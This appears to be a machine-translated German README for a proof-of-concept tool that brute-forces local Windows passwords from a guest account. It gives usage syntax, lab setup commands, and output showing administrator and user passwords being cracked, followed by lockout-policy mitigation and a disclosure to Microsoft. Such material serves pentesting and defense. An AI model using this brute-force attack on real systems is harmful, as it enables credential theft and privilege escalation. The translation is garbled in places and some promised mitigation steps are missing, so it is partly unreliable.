Hinweis 1: Wir freuen uns, Ihnen mitteilen zu können, dass unser aktuelles Tool auf eine PowerShell -Version portiert wurde. Dies bedeutet, dass Benutzer jetzt auf das Tool direkt über die Befehlszeile von PowerShell zugreifen und sie noch bequemer und effizienter zu verwenden. Wir glauben, dass diese neue Version unseren Benutzern stark zugute kommen und ihre Erfahrungen mit dem Tool verbessern wird. Vielen Dank für Ihre fortgesetzte Unterstützung und wir hoffen, dass Sie die neue PowerShell-Version genießen: https://github.com/darkcodersc/power-bute-logon
Hinweis 2: Wir haben kürzlich erfahren, dass Microsoft die Kontosperrrichtlinie in modernen und aktuellen Windows standardmäßig aktiviert hat. Diese Richtlinie hilft, das System zu sichern, indem ein Konto nach einer bestimmten Anzahl fehlgeschlagener Anmeldeversuche gesperrt wird. Dies ist zwar eine vorteilhafte Sicherheitsmaßnahme, aber es macht die Proof-of-Concept (POC) für diese Systeme ineffizient.
Erscheinungsdatum: 2020-05-14
Ziel: Windows XP zur neuesten Windows 10 -Version (1909)
Schwäche Standort: LogonUserA , LogonUserW , CreateProcessWithLogonA , CreateProcessWithLogonW
WinBruteLogon.exe -u <username> -w <wordlist_file>
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Win Brute Logon wurde entwickelt, um einen Brute-Force-Angriff auf ein Microsoft-Konto zu simulieren, indem in kurzer Zeit eine große Anzahl von Passwortkombinationen erraten wird. Dies ermöglicht Pentesters, die Sicherheitshaltung ihrer Systeme zu testen und ihre Verteidigung gegen Brute-Force-Angriffe zu bewerten. Das Tool nutzt das Fehlen eines Kontosperrmechanismus, der in vielen Systemen eine häufige Schwäche ist (bevor die Kontosperrung standardmäßig unter Windows 11 standardmäßig aktiviert wird). Durch den Versuch, das Passwort eines Kontos zu erraten, kann das Tool Pentesters dabei helfen, Schwachstellen in ihren Sicherheitsmaßnahmen zu identifizieren und zu beheben. Es sollte verantwortungsbewusst und innerhalb der Grenzen des Gesetzes verwendet werden.
Für diese Demonstration richten wir eine neue Version von Windows 10 auf einer virtuellen oder physischen Maschine ein. Sobald der Computer eingerichtet ist, melden Sie sich als Administrator an. Erstellen Sie anschließend zwei verschiedene lokale Konten: ein Administratorkonto und ein reguläres Benutzerkonto. Bitte beachten Sie, dass dieser Proof-of-Concept (POC), obwohl wir das Gastkonto für die Demo verwenden, nicht auf das Gastkonto beschränkt sind. Es kann von jedem Konto oder einer Gruppe verwendet werden, einschließlich Gast, regulärer Benutzer und Administratorbenutzer.
net user darkcodersc /add
net user darkcodersc trousers (Hosen ist das Passwort)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm (Ozlq6qwm ist das Passwort)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
In meinem Fall befinden sich sowohl trousers als auch ozlq6qwm in Seclist: https://github.com/danielmiessler/seclists/blob/master/passwords/common-credentials/10k-ford-common.txt
Um mit der Demonstration zu beginnen, melden Sie sich vom Administratorkonto ab oder starten Sie den Computer neu und melden Sie sich beim Gastkonto an. Platzieren Sie dann die ausführbare POC -Datei an einem Ort, an dem Sie als Gastbenutzer Zugriff haben.
Verwendung: WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v ist optional, es entwirft den ausführlichen Modus.
Standardmäßig ist der Domänenname der Wert, den %USERDOMAIN% env var bezeichnet hat. Sie können einen benutzerdefinierten Namen mit Option -d angeben
darkcodersc (Administrator) Eingabeaufforderung (Gast)> WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe (regulärer Benutzer) Eingabeaufforderung (Gast)> WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Warten Sie einige Sekunden, um das folgende Ergebnis zu sehen:
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
"Wenn ein Angreifer in einem realen Szenario Zugriff auf ein niedrig privilegiertes Benutzerkonto erhält, kann er möglicherweise das Kennwort eines privilegierten Benutzers knacken und ihre Berechtigungen eskalieren. Um dieses Risiko zu mildern, können einige Schritte unternommen werden:
Um eine Sicherheitssperrrichtlinie zu implementieren (die standardmäßig nicht aktiviert ist), befolgen Sie diese Schritte:
Bitte beachten Sie, dass die Sperrrichtlinie nicht für das Administratorkonto gilt. In diesem Fall besteht der beste Schutz für das Administratorkonto (falls aktiviert) darin, ein sehr komplexes Passwort einzurichten.
Ein Bericht über diese Schwäche wurde an das Microsoft -Sicherheitsteam gesendet. Sie sollten in Betracht ziehen, die Kontosperrrichtlinie standardmäßig zu aktivieren. "
(Update 2022): Kontosperrung schließlich standardmäßig aktiviert.